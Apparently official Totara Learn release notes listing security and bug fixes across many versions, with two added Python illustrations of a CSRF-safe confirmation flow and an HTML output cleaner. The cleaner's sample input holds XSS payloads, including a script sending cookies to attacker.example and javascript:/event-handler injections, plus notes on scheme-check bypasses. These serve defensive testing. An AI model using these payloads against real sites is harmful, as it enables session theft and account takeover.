Hello everyone,
The following versions of Totara Learn have now been released:
- Release 18.4
- Release 17.17
- Release 16.23
- Release 15.29
- Release 14.34
- Release 13.42
- Release 12.61
- Release 11.61
- Release 10.63
- Release 9.69
- Release 2.9.66
- Release 2.7.71
- Release 2.5.90
- Release 2.2.85
These versions contain security fixes, and for this reason we strongly recommend upgrading.
Each release also includes various bug fixes and improvements.
Kind regards,
Release Team
Release 18.4 (19th March 2024):
Important:
TL-39838 Fixed question bank text not being cleaned on output
    In Totara 13 the consistent cleaning functionality was applied, which cleans content on the site to prevent issues such as cross-site scripting. This resulted in a change of behaviour in certain areas that are documented in our developer docs: https://totara.atlassian.net/wiki/spaces/DEV/pages/121185890/Totara+13+changes+to+content+sanitisation. This change fixes a problem where question text was bypassing the content filtering system, even if consistent cleaning was enabled. If your quiz questions or question banks have custom HTML in them, the data may be lost on the next save. Please check any quiz questions to see whether they need to be modified to work with consistent cleaning.
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Performance improvements:
TL-39814 Reverted a previous improvement that caused performance degradation in visibility queries on large datasets
Bug fixes:
TL-36940 Fixed Engage playlist and resource navigation to remember more than one level of history
TL-37252 Included approval workflow assignment ID number in the fields which get updated when an organisation, position, or audience changes
    The approval workflows framework observes change events for the organisations, positions, and audiences to which assignments are related, and updates those assignments to match. Previously, only the assignment name was updated. But the assignment ID number is based on the organisation or position shortname, or the audience ID number, so this patch ensures it is updated to match. Note that it is not currently possible to manually change an assignment ID number. The included upgrade step will sync assignment ID numbers so that they match the current state of the related organisations, positions, and/or audiences.
TL-38483 Fixed a scenario where users being restored from suspension were no longer members of their tenant audience
    Previously, when a suspended user's audiences were purged, the user was also removed from the tenant audience. If the user was then unsuspended they may not have been returned to their tenant. The only way to fix this was to remove them from the tenant and add them back again on their profile page. With this change there is a new 'unsuspend_user' event, and when it is triggered the correct tenancies are applied. Previously, when unsuspending a user the suspended event was also triggered; this has been changed so that either the suspend or the unsuspend event is triggered, not both. A new script is provided that can be run to find and fix any users who are not in their tenant audience: 'server/admin/cli/fix_orphan_tenant_members.php'.
TL-38582 Fixed notification log report error which was thrown when the linked preference was deleted or didn't exist
TL-38748 Fixed a warning showing in the scheduled tasks output when using Redis
TL-39056 Fixed accounts created via 'Self-registration with approval' sometimes being auto-confirmed by third-party email systems
    When an account is created with the 'Self-registration with approval' plugin, an email is sent to the account with a link the user must click to confirm the account. In some cases the email system would scan links in emails and preload them, in this instance confirming the account. When the user then clicked the link, Totara would show an error as the account had already been confirmed. With this fix the link sent in the email opens a page where the user must press a button to confirm their account.
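The TL-39056 fix and the TL-39921 CSRF fix rest on the same rule: a GET request must never change state, and the POST that does change state must carry a session-bound token. The following is an added illustration of that rule, not Totara's own code (its 'Self-registration with approval' plugin and grade import are not reproduced here). Only the parameter name 'sesskey' follows the Totara/Moodle convention; the AccountStore, Session, confirm_get and confirm_post names, the in-memory token table and the simulated mail scanner are all constructed for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Response:
    status: int
    body: str


@dataclass
class AccountStore:
    """Constructed in-memory stand-in for the user table: confirmation token -> username."""
    pending: dict = field(default_factory=dict)
    confirmed: set = field(default_factory=set)

    def issue_token(self, username: str) -> str:
        token = secrets.token_urlsafe(32)
        self.pending[token] = username
        return token


class Session:
    """Per-browser session holding the anti-CSRF key (named sesskey as in Totara/Moodle)."""
    def __init__(self):
        self.sesskey = secrets.token_hex(16)


def legacy_confirm_get(store: AccountStore, token: str) -> Response:
    """Pre-fix shape of the flow: the GET request itself confirms the account, so anything
    that fetches the link (a mail gateway preloading URLs) consumes it before the user does."""
    username = store.pending.pop(token, None)
    if username is None:
        return Response(400, "invalid or already used link")
    store.confirmed.add(username)
    return Response(200, f"account {username} confirmed")


def confirm_get(store: AccountStore, session: Session, token: str) -> Response:
    """Fixed flow, step 1: GET only renders a page with a button. Nothing changes, so
    a scanner that preloads the link leaves the token intact for the real user."""
    username = store.pending.get(token)
    if username is None:
        return Response(404, "invalid link")
    return Response(200, (
        '<form method="post">'
        f'<input type="hidden" name="token" value="{token}">'
        f'<input type="hidden" name="sesskey" value="{session.sesskey}">'
        f'<button>Confirm account {username}</button></form>'
    ))


def confirm_post(store: AccountStore, session: Session, token: str, sesskey: str) -> Response:
    """Fixed flow, step 2: the state change happens only on POST and only when the
    submitted sesskey matches the session, so a cross-site form post cannot trigger it."""
    if not hmac.compare_digest(sesskey, session.sesskey):
        return Response(403, "invalid sesskey")
    username = store.pending.pop(token, None)
    if username is None:
        return Response(400, "invalid or already used link")
    store.confirmed.add(username)
    return Response(200, f"account {username} confirmed")


def simulate_legacy() -> tuple:
    """Mail scanner preloads the link, then the user clicks it: scanner wins, user gets an error."""
    store = AccountStore()
    token = store.issue_token("alice")
    scanner = legacy_confirm_get(store, token)
    user = legacy_confirm_get(store, token)
    return scanner.status, user.status, "alice" in store.confirmed


def simulate_fixed() -> dict:
    """Same scanner, plus a forged cross-site POST and a replay of the already-used link."""
    store = AccountStore()
    token = store.issue_token("alice")
    scanner = confirm_get(store, Session(), token)
    pending_after_scan = token in store.pending
    user = Session()
    page = confirm_get(store, user, token)
    forged = confirm_post(store, user, token, "0" * 32)
    real = confirm_post(store, user, token, user.sesskey)
    replay = confirm_post(store, user, token, user.sesskey)
    return {
        "scanner_status": scanner.status,
        "pending_after_scan": pending_after_scan,
        "page_has_form": 'method="post"' in page.body,
        "forged_status": forged.status,
        "real_status": real.status,
        "replay_status": replay.status,
        "confirmed": "alice" in store.confirmed,
    }


if __name__ == "__main__":
    print("legacy:", simulate_legacy())
    print("fixed:", simulate_fixed())
```

In the legacy flow the scanner's fetch returns 200 and the user's later click returns 400; in the fixed flow the scanner's fetch leaves the token pending, the forged POST is refused with 403, the user's own button press succeeds and a second press of the same link is rejected. The same POST-plus-sesskey discipline is what an import endpoint such as the course grade XML import needs, since a browser will happily submit a cross-site form to it otherwise.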
TL-39160 Fixed user interest tags not obeying multitenancy visibility rules
TL-39163 Fixed guest autologin not working on dashboards
TL-39182 Centralised notifications can now be disabled by a user in their notification preferences
    Centralised notifications now correctly adhere to the 'emailstop' setting. This setting can now be set on the notification preference page for a user. This also prevents notifications from being sent unexpectedly when adding users via HR import with 'emailstop' set.
TL-39197 Fixed tenant-related notifications not appearing in notification logs for administrators
    This was achieved by bypassing user content restrictions for site administrators. As a result, site administrators can now view data relating to users from all tenants in reports.
    (Evergreen 20240319 wording: This was achieved by changing the user content restrictions to allow system users, those not belonging to a tenant, to view data relating to users from all tenants in reports. This brings user content restrictions for system users in line with documentation and other functionality.)
TL-39230 Fixed the seminar fatal error on updating settings when using the 'Require event over for' setting
TL-39271 Changed seminar reservation cancelled notification to send to affected managers only
    Before this change, if a manager's reservations were cancelled, a notification was sent to all managers who have reservations. Now it is only sent to the affected manager. Third-party recipients will now receive one notification for each affected manager.
TL-39398 Fixed Pathway format courses triggering three course_viewed events
    Removed the course_viewed event trigger from the get_course_completion_for_header and get_course_navigation queries for the Pathway course format, since they were creating additional course_viewed events even though they do not let users view course contents.
TL-39426 Moved seminar virtual room URL from location to description in iCal
    When a seminar room contains a virtual room link, the link was being included in the LOCATION property of the iCal email attachments. This caused problems in some calendars, where clicking the location would attempt to find a place on a map using the URL as text. Now the virtual room URLs are added to the iCal DESCRIPTION and can be clicked to open the virtual meeting.
TL-39429 Fixed a problem where the 'User reports to any of these users' dynamic audience rule would show an error
    In a scenario where the 'User reports to any of these users' dynamic audience rule was applied and there were no users with a matching job assignment, an error could appear in the scheduled tasks job.
TL-39511 Fixed locale not being applied correctly in approval workflows date fields
TL-39530 Allowed admins to change activity completion method for activities requiring a passing grade
TL-39548 Improved keyboard navigation to block sidebars
TL-39574 Fixed wrong progress sorting order for the Totara Goals status report
TL-39576 Fixed HTMLPurifier stripping ARIA attributes from content during cleaning
TL-39612 Fixed current filters being forgotten when multiple report table blocks are added to the same page
TL-39614 Moved results information to a heading above the report results tables
    Previously the number of found rows in different kinds of reports was inconsistently displayed. With this change the number of records loaded now shows in a heading above the report table. All existing pages embedding reports have been updated. Any custom code embedding reports needs to be manually updated to reflect this.
TL-39670 Fixed an error when adding an external LTI tool with PHP 8.0 or higher
    Previously, adding an external LTI tool with Totara running on PHP 8.0 or higher could result in an error under certain conditions, related to the lti_is_cartridge() check. This patch fixes the problem.
TL-39699 Fixed placeholder failure in Course Due Date course notification during audience assignment
TL-39786 Fixed user profile blocks relying on expected autoincrement IDs
TL-39808 Added lang string replacement to the application form preview in approval workflows
    Previously approval forms would show the lang string keys when previewing. This has now been updated to replace the lang string keys with their corresponding values.
TL-39843 Fixed links to tel and sms protocols being removed by HTMLPurifier during cleaning
TL-39852 Fixed sections in topic format not having the correct role for screen readers
TL-39859 Fixed dates not translating correctly on Windows servers
TL-39904 Fixed Workspace Owner and Workspace creator roles having no context level set
TL-39914 Addressed an issue where view-only participants couldn't preview Totara goals within a performance activity
Tui front end framework:
TL-37951 Updated WorkspaceDiscussionTab.vue to ignore errors in fetchMore queries if the component has been unmounted
    This is a workaround for an error that occurs when a fetchMore apollo query returns after the component has been unmounted. This only happens with the fetchMore method, so it is likely an issue with vue apollo.
TL-39926 Fixed Tui checkboxes having double labels when used in Uniform
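Three entries in this release (and in 17.17) concern the same mechanism: consistent cleaning now also covers question text (TL-39838), while the cleaner no longer strips ARIA attributes (TL-39576) or tel:/sms: links (TL-39843). The following is an added illustration of what an allowlist-based output cleaner does to a question text containing custom HTML; it is not HTMLPurifier and not Totara code. The allowlists, the OutputCleaner class, the clean_output function and the sample question text are constructed for the example, and Totara's real HTMLPurifier configuration permits considerably more markup. The point of the 'dropped' list is the pre-upgrade check the Important note asks for: it is the part of the fragment that "may be lost on the next save".

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allowlists constructed for this example; Totara's HTMLPurifier configuration is broader.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a", "span", "div", "img"}
ALLOWED_ATTRS = {"href", "src", "alt", "title", "class", "role"}
ALLOWED_SCHEMES = {"http", "https", "mailto", "tel", "sms"}   # tel/sms kept, cf. TL-39843
VOID_TAGS = {"br", "img"}
DROP_WITH_CONTENT = {"script", "style"}


class OutputCleaner(HTMLParser):
    """Rebuilds a fragment from an allowlist. Anything not on the list is dropped and
    recorded, which is what a site owner needs to review before the content is re-saved."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []
        self.open_tags = []
        self.skip_depth = 0   # > 0 while inside script/style, whose text is discarded

    def attribute_allowed(self, name, value):
        if name.startswith("on"):                 # event handlers are never kept
            return False
        if name in ("href", "src"):
            # Browsers ignore tab/newline inside a URL, so strip them before reading the
            # scheme; otherwise "java\tscript:" slips past a naive prefix check.
            compact = "".join(ch for ch in value if ch not in "\t\n\r").strip()
            try:
                scheme = urlsplit(compact).scheme.lower()
            except ValueError:                    # unparsable URL: treat as unsafe
                return False
            return scheme == "" or scheme in ALLOWED_SCHEMES
        return name in ALLOWED_ATTRS or name.startswith("aria-")   # ARIA kept, cf. TL-39576

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            self.dropped.append(f"<{tag}>")
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}>")       # tag removed, its text content kept
            return
        kept = []
        for name, value in attrs:                 # parser has already decoded entities here
            value = value or ""
            if self.attribute_allowed(name, value):
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
            else:
                self.dropped.append(f"{tag}@{name}")
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif tag in self.open_tags:               # close it and anything left open inside it
            while True:
                top = self.open_tags.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        if self.skip_depth == 0:
            self.out.append(html.escape(data, quote=False))


def clean_output(fragment: str):
    """Returns (cleaned fragment, list of what was removed)."""
    cleaner = OutputCleaner()
    cleaner.feed(fragment)
    cleaner.close()
    while cleaner.open_tags:                      # close anything the author left open
        cleaner.out.append(f"</{cleaner.open_tags.pop()}>")
    return "".join(cleaner.out), cleaner.dropped


# Constructed sample of a question text with custom HTML, not data from any real site.
SAMPLE_QUESTION = (
    '<p>Which statement is <b onmouseover="alert(1)">true</b>?</p>'
    '<script>document.location="https://attacker.example/?c="+document.cookie</script>'
    '<a href="javascript:alert(document.domain)">help</a>'
    '<a href="tel:+6444123456" aria-label="Call the help desk">call us</a>'
    '<span role="note" aria-hidden="true" style="x:expression()">hidden</span>'
    '<img src="x" onerror="alert(1)" alt="diagram">'
    '<custom-widget data-id="7">widget text</custom-widget>'
)

if __name__ == "__main__":
    cleaned, dropped = clean_output(SAMPLE_QUESTION)
    print(cleaned)
    print("dropped:", dropped)
```

Run against the sample, the script block and the event handlers disappear, the javascript: link keeps its text but loses its href, the unknown custom-widget element is unwrapped to its text, while the tel: link, the aria-* attributes and the role attribute come through untouched. Scheme checks are done on the entity-decoded value with tabs and newlines removed, because that is how a browser will read the URL; a check on the raw attribute text would pass both "&#106;avascript:" and "java\tscript:".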
Release 17.17 (19th March 2024):
Important:
TL-39838 Fixed question bank text not being cleaned on output
    In Totara 13 the consistent cleaning functionality was applied, which cleans content on the site to prevent issues such as cross-site scripting. This resulted in a change of behaviour in certain areas that are documented in our developer docs: https://totara.atlassian.net/wiki/spaces/DEV/pages/121185890/Totara+13+changes+to+content+sanitisation. This change fixes a problem where question text was bypassing the content filtering system, even if consistent cleaning was enabled. If your quiz questions or question banks have custom HTML in them, the data may be lost on the next save. Please check any quiz questions to see whether they need to be modified to work with consistent cleaning.
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Performance improvements:
TL-39814 Reverted a previous improvement that caused performance degradation in visibility queries on large datasets
Improvements:
TL-37335 Removed toast from Atto editor auto save on draft
Bug fixes:
TL-36940 Fixed Engage playlist and resource navigation to remember more than one level of history
TL-37252 Included approval workflow assignment ID number in the fields which get updated when an organisation, position, or audience changes
    The approval workflows framework observes change events for the organisations, positions, and audiences to which assignments are related, and updates those assignments to match. Previously, only the assignment name was updated. But the assignment ID number is based on the organisation or position shortname, or the audience ID number, so this patch ensures it is updated to match. Note that it is not currently possible to manually change an assignment ID number.
    The included upgrade step will sync assignment ID numbers so that they match the current state of the related organisations, positions, and/or audiences.
TL-38483 Fixed a scenario where users being restored from suspension were no longer members of their tenant audience
    Previously, when a suspended user's audiences were purged, the user was also removed from the tenant audience. If the user was then unsuspended they may not have been returned to their tenant. The only way to fix this was to remove them from the tenant and add them back again on their profile page. With this change there is a new 'unsuspend_user' event, and when it is triggered the correct tenancies are applied. Previously, when unsuspending a user the suspended event was also triggered; this has been changed so that either the suspend or the unsuspend event is triggered, not both. A new script is provided that can be run to find and fix any users who are not in their tenant audience: 'server/admin/cli/fix_orphan_tenant_members.php'.
TL-38582 Fixed notification log report error which was thrown when the linked preference was deleted or didn't exist
TL-38748 Fixed a warning showing in the scheduled tasks output when using Redis
TL-39056 Fixed accounts created via 'Self-registration with approval' sometimes being auto-confirmed by third-party email systems
    When an account is created with the 'Self-registration with approval' plugin, an email is sent to the account with a link the user must click to confirm the account. In some cases the email system would scan links in emails and preload them, in this instance confirming the account. When the user then clicked the link, Totara would show an error as the account had already been confirmed. With this fix the link sent in the email opens a page where the user must press a button to confirm their account.
TL-39160 Fixed user interest tags not obeying multitenancy visibility rules
TL-39163 Fixed guest autologin not working on dashboards
TL-39182 Centralised notifications can now be disabled by a user in their notification preferences
    Centralised notifications now correctly adhere to the 'emailstop' setting. This setting can now be set on the notification preference page for a user. This also prevents notifications from being sent unexpectedly when adding users via HR import with 'emailstop' set.
TL-39197 Fixed tenant-related notifications not appearing in notification logs for administrators
    This was achieved by bypassing user content restrictions for site administrators. As a result, site administrators can now view data relating to users from all tenants in reports.
    (Evergreen 20240319 wording: This was achieved by changing the user content restrictions to allow system users, those not belonging to a tenant, to view data relating to users from all tenants in reports. This brings user content restrictions for system users in line with documentation and other functionality.)
TL-39271 Changed seminar reservation cancelled notification to send to affected managers only
    Before this change, if a manager's reservations were cancelled, a notification was sent to all managers who have reservations. Now it is only sent to the affected manager. Third-party recipients will now receive one notification for each affected manager.
TL-39426 Moved seminar virtual room URL from location to description in iCal
    When a seminar room contains a virtual room link, the link was being included in the LOCATION property of the iCal email attachments. This caused problems in some calendars, where clicking the location would attempt to find a place on a map using the URL as text. Now the virtual room URLs are added to the iCal DESCRIPTION and can be clicked to open the virtual meeting.
TL-39429 Fixed a problem where the 'User reports to any of these users' dynamic audience rule would show an error
    In a scenario where the 'User reports to any of these users' dynamic audience rule was applied and there were no users with a matching job assignment, an error could appear in the scheduled tasks job.
TL-39548 Improved keyboard navigation to block sidebars
TL-39576 Fixed HTMLPurifier stripping ARIA attributes from content during cleaning
TL-39595 Fixed accessibility issue with single activity course headings
TL-39612 Fixed current filters being forgotten when multiple report table blocks are added to the same page
TL-39614 Moved results information to a heading above the report results tables
    Previously the number of found rows in different kinds of reports was inconsistently displayed. With this change the number of records loaded now shows in a heading above the report table. All existing pages embedding reports have been updated. Any custom code embedding reports needs to be manually updated to reflect this.
TL-39670 Fixed an error when adding an external LTI tool with PHP 8.0 or higher
    Previously, adding an external LTI tool with Totara running on PHP 8.0 or higher could result in an error under certain conditions, related to the lti_is_cartridge() check. This patch fixes the problem.
TL-39699 Fixed placeholder failure in Course Due Date course notification during audience assignment
TL-39786 Fixed user profile blocks relying on expected autoincrement IDs
TL-39843 Fixed links to tel and sms protocols being removed by HTMLPurifier during cleaning
TL-39852 Fixed sections in topic format not having the correct role for screen readers
TL-39859 Fixed dates not translating correctly on Windows servers
TL-39904 Fixed Workspace Owner and Workspace creator roles having no context level set
Tui front end framework:
TL-37951 Updated WorkspaceDiscussionTab.vue to ignore errors in fetchMore queries if the component has been unmounted
    This is a workaround for an error that occurs when a fetchMore apollo query returns after the component has been unmounted. This only happens with the fetchMore method, so it is likely an issue with vue apollo.
TL-39926 Fixed Tui checkboxes having double labels when used in Uniform
Release 16.23 (19th March 2024):
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Bug fixes:
TL-38483 Fixed a scenario where users being restored from suspension were no longer members of their tenant audience
    Previously, when a suspended user's audiences were purged, the user was also removed from the tenant audience. If the user was then unsuspended they may not have been returned to their tenant. The only way to fix this was to remove them from the tenant and add them back again on their profile page. With this change there is a new 'unsuspend_user' event, and when it is triggered the correct tenancies are applied. Previously, when unsuspending a user the suspended event was also triggered; this has been changed so that either the suspend or the unsuspend event is triggered, not both. A new script is provided that can be run to find and fix any users who are not in their tenant audience: 'server/admin/cli/fix_orphan_tenant_members.php'.
TL-38748 Fixed a warning showing in the scheduled tasks output when using Redis
TL-39429 Fixed a problem where the 'User reports to any of these users' dynamic audience rule would show an error
    In a scenario where the 'User reports to any of these users' dynamic audience rule was applied and there were no users with a matching job assignment, an error could appear in the scheduled tasks job.
TL-39612 Fixed current filters being forgotten when multiple report table blocks are added to the same page
TL-39786 Fixed user profile blocks relying on expected autoincrement IDs
Release 15.29 (19th March 2024):
Important:
TL-39838 Fixed question bank text not being cleaned on output
    In Totara 13 the consistent cleaning functionality was applied, which cleans content on the site to prevent issues such as cross-site scripting. This resulted in a change of behaviour in certain areas that are documented in our developer docs: https://totara.atlassian.net/wiki/spaces/DEV/pages/121185890/Totara+13+changes+to+content+sanitisation. This change fixes a problem where question text was bypassing the content filtering system, even if consistent cleaning was enabled. If your quiz questions or question banks have custom HTML in them, the data may be lost on the next save. Please check any quiz questions to see whether they need to be modified to work with consistent cleaning.
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Bug fixes:
TL-39429 Fixed a problem where the 'User reports to any of these users' dynamic audience rule would show an error
    In a scenario where the 'User reports to any of these users' dynamic audience rule was applied and there were no users with a matching job assignment, an error could appear in the scheduled tasks job.
TL-39612 Fixed current filters being forgotten when multiple report table blocks are added to the same page
Release 14.34 (19th March 2024):
Important:
TL-39838 Fixed question bank text not being cleaned on output
    In Totara 13 the consistent cleaning functionality was applied, which cleans content on the site to prevent issues such as cross-site scripting. This resulted in a change of behaviour in certain areas that are documented in our developer docs. This change fixes a problem where question text was bypassing the content filtering system, even if consistent cleaning was enabled. If your quiz questions or question banks have custom HTML in them, the data may be lost on the next save. Please check any quiz questions to see whether they need to be modified to work with consistent cleaning.
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Bug fixes:
TL-39429 Fixed a problem where the 'User reports to any of these users' dynamic audience rule would show an error
    In a scenario where the 'User reports to any of these users' dynamic audience rule was applied and there were no users with a matching job assignment, an error could appear in the scheduled tasks job.
TL-39612 Fixed current filters being forgotten when multiple report table blocks are added to the same page
Release 13.42 (19th March 2024):
Important:
TL-39838 Fixed question bank text not being cleaned on output
    In Totara 13 the consistent cleaning functionality was applied, which cleans content on the site to prevent issues such as cross-site scripting. This resulted in a change of behaviour in certain areas that are documented in our developer docs: https://totara.atlassian.net/wiki/spaces/DEV/pages/121185890/Totara+13+changes+to+content+sanitisation. This change fixes a problem where question text was bypassing the content filtering system, even if consistent cleaning was enabled. If your quiz questions or question banks have custom HTML in them, the data may be lost on the next save. Please check any quiz questions to see whether they need to be modified to work with consistent cleaning.
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Bug fixes:
TL-39612 Fixed current filters being forgotten when multiple report table blocks are added to the same page
Release 12.61 (19th March 2024):
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 11.61 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 10.63 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 9.69 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 2.9.66 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 2.7.71 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 2.5.90 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 2.2.85 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades